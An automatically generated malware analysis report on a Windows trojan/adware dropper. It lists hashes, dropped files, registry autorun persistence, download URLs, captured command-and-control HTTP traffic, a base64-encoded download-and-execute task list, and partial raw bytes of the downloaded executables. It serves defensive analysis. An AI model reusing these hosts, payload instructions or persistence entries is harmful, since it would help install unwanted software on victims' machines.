Gen.Variant.Barys.55356_f1ec03d5a4

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Barys.55356 (B) (Emsisoft), Gen:Variant.Barys.55356 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS) Behaviour: Trojan The description has been aut...
Blog rating:2 out of5 with1 ratings

Gen.Variant.Barys.55356_f1ec03d5a4

by malwarelabrobot on May 1st, 2017 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Barys.55356 (B) (Emsisoft), Gen:Variant.Barys.55356 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: f1ec03d5a422b1abb0b75d78a1c994fb
SHA1: 69fb4d5ba39a7a804728fa52b52a8e5d36491d0f
SHA256: 3a10ecdbf853d29fe26438917d92f4f4502ff8a6dee9021fafbc83dfade3a58d
SSDeep: 49152:6mbprTcg3cSkNP5eQEudg8LfpZI/HXnm:
Size: 2464768 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2017-04-24 08:53:18
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

0c8sG5Y9ZDReGyR0kr6B.exe:2924
pops.exe:1672
HaveFun.exe:3352

The Trojan injects its code into the following process(es):

0c8sG5Y9ZD.exe:1992
0c8sG5Y9ZDReGyR0kr6B.exe:3036
%original file name%.exe:2712
677753.exe:3556

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process 0c8sG5Y9ZD.exe:1992 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cast.config (37 bytes)

The process 0c8sG5Y9ZDReGyR0kr6B.exe:3036 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\GPCKEC9RLQ\HaveFun.exe.config.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\config.conf (32 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\GPCKEC9RLQ\HaveFun.exe (237130 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\GPCKEC9RLQ\pops.exe.config.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\GPCKEC9RLQ\pops.exe (400 bytes)

The process pops.exe:1672 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\808896\677753.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\808896\677753.exe (204 bytes)

The process %original file name%.exe:2712 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0c8sG5Y9ZD.exe (65224 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0c8sG5Y9ZDReGyR0kr6B.exe (26099 bytes)

Registry activity

The process 0c8sG5Y9ZD.exe:1992 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\0c8sG5Y9ZD_RASMANCS]
"EnableConsoleTracing" = "0"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\0c8sG5Y9ZD_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\0c8sG5Y9ZD_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Microsoft\Tracing\0c8sG5Y9ZD_RASAPI32]
"EnableConsoleTracing" = "0"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\0c8sG5Y9ZD_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\0c8sG5Y9ZD_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\0c8sG5Y9ZD_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\0c8sG5Y9ZD_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"5XTP8SOZXJ5K2MD" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0c8sG5Y9ZD.exe"

The process 0c8sG5Y9ZDReGyR0kr6B.exe:3036 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\0c8sG5Y9ZDReGyR0kr6B_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\0c8sG5Y9ZDReGyR0kr6B_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\0c8sG5Y9ZDReGyR0kr6B_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\0c8sG5Y9ZDReGyR0kr6B_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Microsoft\Tracing\0c8sG5Y9ZDReGyR0kr6B_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\0c8sG5Y9ZDReGyR0kr6B_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\0c8sG5Y9ZDReGyR0kr6B_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\0c8sG5Y9ZDReGyR0kr6B_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\0c8sG5Y9ZDReGyR0kr6B_RASMANCS]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_AKR6B" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0c8sG5Y9ZDReGyR0kr6B.exe"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process 0c8sG5Y9ZDReGyR0kr6B.exe:2924 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process pops.exe:1672 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\pops_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\pops_RASMANCS]
"EnableFileTracing" = "0"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\pops_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\pops_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\pops_RASAPI32]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process %original file name%.exe:2712 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\f1ec03d5a422b1abb0b75d78a1c994fb_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\CasterDate]
"date" = "30/04/2017"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\f1ec03d5a422b1abb0b75d78a1c994fb_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\f1ec03d5a422b1abb0b75d78a1c994fb_RASMANCS]
"EnableConsoleTracing" = "0"
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\wewewe]
"partner" = "tuto"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKCU\Software\Microsoft\wewewe]
"Product" = "diskpower"
"channel" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\f1ec03d5a422b1abb0b75d78a1c994fb_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\f1ec03d5a422b1abb0b75d78a1c994fb_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\f1ec03d5a422b1abb0b75d78a1c994fb_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\f1ec03d5a422b1abb0b75d78a1c994fb_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\f1ec03d5a422b1abb0b75d78a1c994fb_RASAPI32]
"EnableFileTracing" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process HaveFun.exe:3352 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\HaveFun_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\HaveFun_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\HaveFun_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Microsoft\Tracing\HaveFun_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\HaveFun_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\HaveFun_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\HaveFun_RASAPI32]
"FileTracingMask" = "4294901760"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\HaveFun_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\HaveFun_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\HaveFun_RASMANCS]
"FileTracingMask" = "4294901760"

The process 677753.exe:3556 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"602883" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\808896\677753.exe"

Dropped PE files

MD5 File path
a3bccd7e94fffff0645143491a4e12b0 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\0c8sG5Y9ZD.exe
324e5d2a28c74423fd2543f1fb07eed8 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\0c8sG5Y9ZDReGyR0kr6B.exe
cd9f1c13bdb1312986a298a52a732c2b c:\Users\"%CurrentUserName%"\AppData\Local\Temp\GPCKEC9RLQ\HaveFun.exe
2c0e45bd928cd5990b8a61611d82255d c:\Users\"%CurrentUserName%"\AppData\Local\Temp\GPCKEC9RLQ\pops.exe
dbd4830abcacb1a4674b0bfcbc536632 c:\Users\"%CurrentUserName%"\AppData\Roaming\808896\677753.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: B
Product Name: B6BCT
Product Version: 0.8.2.1
Legal Copyright: Copyright (c) 9682
Legal Trademarks:
Original Filename: Shooting.exe
Internal Name: Shooting.exe
File Version: 0.8.2.1
File Description:
Comments: B6BCT88FN
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 8192 2450728 2450944 4.16653 230d155d1a876142f76b515cdeb5b9f6
.rsrc 2465792 12336 12800 3.07361 303f403ca50cc818039742fd90d3030d
.reloc 2482176 12 512 0.070639 ae09f4ca7437d464fa94dbe0c0729317

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://healthydownload.com/get/4/remote.exe 94.23.199.17
hxxp://healthydownload.com/get/3/wizzcaster_v2.exe 94.23.199.17
hxxp://wizzcaster.com/remotes_xml_sections.php 176.31.115.114
hxxp://healthydownload.com/from_backup/AdsShow_installer.exe 94.23.199.17
hxxp://wizzcaster.com/api/v5/config 176.31.115.114
hxxp://healthydownload.com/get/4/updater.exe 94.23.199.17
hxxp://wizzcaster.com/api/v5/link 176.31.115.114
hxxp://healthydownload.com/safe_download/AdsShow.exe 94.23.199.17
hxxp://wizzcaster.com/wemonetize/wizzmonetize/sales_we_diskpower_tuto_1_load 176.31.115.114
hxxp://www.wizzmonetize.com/remotes_xml_sections.php 188.165.209.131
hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_diskpower_tuto_1_load 176.31.252.74


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

POST /wemonetize/wizzmonetize/sales_we_diskpower_tuto_1_load HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




api_key=fa02609b-2368-11e6-922f-0cc47a47968c

HTTP/1.1 200 OK


Date: Sun, 30 Apr 2017 18:32:07 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=k5ikgkh8hqgmul6g2rj09i65p4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}....



POST /remotes_xml_sections.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.wizzmonetize.com
Content-Length: 154
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




remote_id=1&user_name=wemonetize&api_key=e721cfcc-2148-11e6-922f-0cc47
a47968c&buying_product_name=diskpower&buying_partner_name=tuto&buying_
channel_name=1

HTTP/1.1 200 OK


Date: Sun, 30 Apr 2017 18:32:00 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=r4l986j0gch36ju0v6bd81s7l6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1076
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
PHVwZGF0ZXMgcmVmcmVzaD0iNjAiPgoKPHRhc2s DQoNCjxwZXJmb3JtPg0KDQo8ZG93bm
xvYWQgbmFtZT0icG9wcyIgdmFsdWU9Imh0dHA6Ly9oZWFsdGh5ZG93bmxvYWQuY29tL2Zy
b21fYmFja3VwL0Fkc1Nob3dfaW5zdGFsbGVyLmV4ZSIgdmVyc2lvbj0iIiAgc29mdHdhcm
U9IiIgbmV0PSJ5ZXMiIC8 DQo8cHJvY2VzcyB0eXBlPSJzdGFydCIgbmFtZT0icG9wcyIg
dmFsdWU9Im5vdHdhaXQiIHBhcmFtcz0ibmltcG9ydGUiLz4NCjxtb2QgdHlwZT0iYWRkIi
BuYW1lPSJwb3BzIiB2YWx1ZT0iMTcwNDMwIi8 DQoNCjwvcGVyZm9ybT4NCg0KPGNvbmRp
dGlvbnM DQoNCjxtb2QgdHlwZT0iY2hlY2siIG5hbWU9InBvcHMiIHZhbHVlPSIxNzA0Mz
AiIG1hdGNoPSJmYWxzZSIvPg0KDQo8L2NvbmRpdGlvbnM DQo8L3Rhc2s PHRhc2s DQoN
CjxwZXJmb3JtPg0KDQo8ZG93bmxvYWQgbmFtZT0iSGF2ZUZ1biIgdmFsdWU9Imh0dHA6Ly
9oZWFsdGh5ZG93bmxvYWQuY29tL2dldC80L3VwZGF0ZXIuZXhlIiB2ZXJzaW9uPSIiICBz
b2Z0d2FyZT0iIiBuZXQ9InllcyIgLz4NCjxwcm9jZXNzIHR5cGU9InN0YXJ0IiBuYW1lPS
JIYXZlRnVuIiB2YWx1ZT0id2FpdCIgcGFyYW1zPSJ3ZSIvPg0KPG1vZCB0eXBlPSJhZGQi
IG5hbWU9InVwVG9EYXRlIiB2YWx1ZT0ibGwxNzA0MzAiLz4NCg0KPC9wZXJmb3JtPg0KDQ
o8Y29uZGl0aW9ucz4NCg0KPG1vZCB0eXBlPSJjaGVjayIgbmFtZT0idXBUb0RhdGUiIHZh
bHVlPSJsbDE3MDQzMCIgbWF0Y2g9ImZhbHNlIi8 DQoNCjwvY29uZGl0aW9ucz4NCjwvdG
Fzaz4KPC91cGRhdGVzPgoKCg==..



GET /safe_download/AdsShow.exe HTTP/1.1
Host: healthydownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sun, 30 Apr 2017 18:32:06 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
2000..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
.....Y.........."...0.............J2... ...@....@.. ..................
..................@..................................1..O....@........
...............`.......0..............................................
. ............... ..H............text...P.... ...................... .
.`.rsrc........@......................@..@.reloc.......`..............
........@..B................,2......H.......`"...............0........
.......................................0..:........s...............,..
......,c.~....r...p.o...............,..........{ ....o........(....r].
.p(....o....r]..p(....o.......o.................,...8..........,. `...
...o....Z(.....ra..p..~.......o..........o....t ....."...%..".o ......
.s!.......o".....o#......o"...r...po$......o%...& `......o....Z(......
...8_...&....*..A...........-...4...........&.(&.....*...0..9........~
.........,".r...p.....('...o(...s)...........~..... ..*....0..........
.~..... ..*".......*.0...........~..... ..*".(*....*Vs....( ...t......
...*..BSJB............v2.0.50727......l.......#~..|...h...#Strings....
....L...#US.0.......#GUID...@...h...#Blob...........W..........3......
..&................... ...............................................
.. ..... ...N.............b.....b.....b...n.b...:.b...S.b.....b...{...
..........b.....................4...........t...........1....... .....
K...~.M.........b.......8...^...........U.b.........).............
<<< skipped >>>


GET /get/3/wizzcaster_v2.exe HTTP/1.1
Host: healthydownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sun, 30 Apr 2017 18:31:58 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_v2.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
cea00..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
......Y.........."...0..&...........D... ...`....@.. .................
......@............@.................................PD..O....`..P....
................ .......C.............................................
.. ............... ..H............text....$... ...&.................. 
..`.rsrc...P....`.......(..............@..@.reloc....... .............
.........@..B.................D......H........#...............2.......
........................................0.............(.............*.
..................0...........~.....s........#...o........#...s.......
r...pr...p ......#...o....o......(......o....s..........o.....s.......
......io.......o.......o .....#........jo!...........o ...io"...&(#...
..o$.........,...o%..........,...o%........ ...*.........n.R.........]
.s........0............r...p.(&......o'.....s(.....o)......o*.....o ..
...... ...%..|.o,.............(....(........(-.......o....r)..po/.....
.o0...t...............,..r?..ps1...z.........%...o2...&.........*.....
...........&.(3.....*...0..9........~.........,".rA..p.....(4...o5...s
6...........~..... ..*....0...........~..... ..*".......*.0...........
~..... ..*".(7....*Vs....(8...t.........*..BSJB............v2.0.50727.
.....l.......#~..H...p...#Strings........|...#US.4.......#GUID...D....
...#Blob...........W..........3........0...................8..........
.........................................m.7.....7................
<<< skipped >>>


GET /get/4/remote.exe HTTP/1.1
Host: healthydownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sun, 30 Apr 2017 18:31:58 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="remote.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
3ae00..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
...(..Y.........."...0.............".... ... ....@.. .................
...................@.....................................O.... ..\....
......................................................................
.. ............... ..H............text...(.... ...................... 
..`.rsrc...\.... ......................@..@.reloc.....................
.........@..B........................H........#...............2.......
........................................0.............(.............*.
..................0...........~.....s........#...o........#...s.......
r...pr...p ......#...o....o......(......o....s..........o.....s.......
......io.......o.......o .....#........jo!...........o ...io"...&(#...
..o$.........,...o%..........,...o%........ ...*.........n.R.........]
.s........0............r...p.(&......o'.....s(.....o)......o*.....o ..
...... ...%..|.o,.............(....(........(-.......o....r)..po/.....
.o0...t...............,..r?..ps1...z.........%...o2...&.........*.....
...........&.(3.....*...0..9........~.........,".rA..p.....(4...o5...s
6...........~..... ..*....0...........~..... ..*".......*.0...........
~..... ..*".(7....*Vs....(8...t.........*..BSJB............v2.0.50727.
.....l.......#~..H...p...#Strings........|...#US.4.......#GUID...D....
...#Blob...........W..........3........0...................8..........
.........................................m.7.....7................
<<< skipped >>>


GET /from_backup/AdsShow_installer.exe HTTP/1.1
Host: healthydownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sun, 30 Apr 2017 18:32:02 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow_installer.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
2800..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
..R..Y.........."...0.............2;... ...@....@.. ..................
..................@..................................:..O....@........
...............`.......9..............................................
. ............... ..H............text...8.... ...................... .
.`.rsrc........@......................@..@.reloc.......`.......&......
........@..B.................;......H.......d"...............8........
.......................................0..........s.......(..... @... 
....o.......(....(....%(....&. .... .O..o.......(....r...p(....(.....s
....r...ps.....o....(.......!...%.ru..p.%.r...p.%.r...p.%.rQ..p.%.r...
p.%.r...p.%.r...p.%.r...p.%.ri..p.%..r...p.%..r...p.%..rN..p.%..r...p.
%..r...p.%..rU..p.%..r...p.%..r...p.%..r...p.%..r...p.%..r...p.%..r5..
p.%..rS..p.%..rq..p.%..r...p.%..r...p.%..r#..p.(......rE..p(.....(....
....( ...&..&..*..A...........~...~.............(!...*.~....-.rU..p...
..("...o#...s$........~....*.~....*.......*.~....*..(%...*Vs....(&...t
.........*BSJB............v2.0.50727......l.......#~..h...P...#Strings
............#US.h.......#GUID...x.......#Blob...........W..........3..
......)...................&...........................................
................O.............O.....O.....O...o.O...;.O...T.O.....O...
|.............O.....................a...........2.............N...k.:.
........c.......%.......o...................D.....w...............
<<< skipped >>>

GET /get/4/updater.exe HTTP/1.1


Host: healthydownload.com


HTTP/1.1 200 OK
Date: Sun, 30 Apr 2017 18:32:03 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="updater.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
23cc00..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$.......PE..
L...)..Y.........."...0...!.........:&!.. ...@!...@.. ................
....... $...........@..................................%!.O....@!.\...
..................$......$!...........................................
... ............... ..H............text...@.!.. ....!.................
 ..`.rsrc...\....@!.......!.............@..@.reloc........$.......#...
..........@..B.................&!.....H........#...............2.... .
.........................................0.............(.............*
...................0...........~.....s........#...o........#...s......
.r...pr...p ......#...o....o......(......o....s..........o.....s......
.......io.......o.......o .....#........jo!...........o ...io"...&(#..
...o$.........,...o%..........,...o%........ ...*.........n.R.........
].s........0............r...p.(&......o'.....s(.....o)......o*.....o .
....... ...%..|.o,.............(....(........(-.......o....r)..po/....
..o0...t...............,..r?..ps1...z.........%...o2...&.........*....
............&.(3.....*...0..9........~.........,".rA..p.....(4...o5...
s6...........~..... ..*....0...........~..... ..*".......*.0..........
.~..... ..*".(7....*Vs....(8...t.........*..BSJB............v2.0.50727
......l.......#~..H...p...#Strings........|...#US.4.......#GUID...D...
....#Blob...........W..........3........0...................8.........
..........................................m.7.....7...............
<<< skipped >>>


POST /api/v5/config HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: wizzcaster.com
Content-Length: 38
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




uid=57a764d042bf8&days_after_install=0

HTTP/1.1 200 OK


Date: Sun, 30 Apr 2017 18:32:02 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=28c8805ce4ed988b894068b634a23363093ba9e6; expires=Sun, 30-Apr-2017 20:32:02 GMT; Max-Age=7200; path=/; httponly
Content-Length: 28
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"time_between_prints":"15"}HTTP/1.1 200 OK..Date: Sun, 30 Apr 2017 18
:32:02 GMT..Server: Apache/2.4.10 (Debian)..Cache-Control: no-cache..S
et-Cookie: laravel_session=28c8805ce4ed988b894068b634a23363093ba9e6; e
xpires=Sun, 30-Apr-2017 20:32:02 GMT; Max-Age=7200; path=/; httponly..
Content-Length: 28..Keep-Alive: timeout=10, max=100..Connection: Keep-
Alive..Content-Type: text/html; charset=UTF-8..{"time_between_prints":
"15"}....


POST /api/v5/link HTTP/1.1


Content-Type: application/x-www-form-urlencoded
Host: wizzcaster.com
Content-Length: 17
Expect: 100-continue


HTTP/1.1 100 Continue
....




uid=57a764d042bf8

HTTP/1.1 200 OK


Date: Sun, 30 Apr 2017 18:32:03 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=acab1b7ffe2fa9eb1b4ba290e7e4bd4ae64103c4; expires=Sun, 30-Apr-2017 20:32:03 GMT; Max-Age=7200; path=/; httponly
Content-Length: 62
Content-Type: text/html; charset=UTF-8
{"link":"http:\/\/bigpicturepop.com\/redirect\/57a764d042bf8"}HTTP/1.1
 200 OK..Date: Sun, 30 Apr 2017 18:32:03 GMT..Server: Apache/2.4.10 (D
ebian)..Cache-Control: no-cache..Set-Cookie: laravel_session=acab1b7ff
e2fa9eb1b4ba290e7e4bd4ae64103c4; expires=Sun, 30-Apr-2017 20:32:03 GMT
; Max-Age=7200; path=/; httponly..Content-Length: 62..Content-Type: te
xt/html; charset=UTF-8..{"link":"http:\/\/bigpicturepop.com\/redirect\
/57a764d042bf8"}..

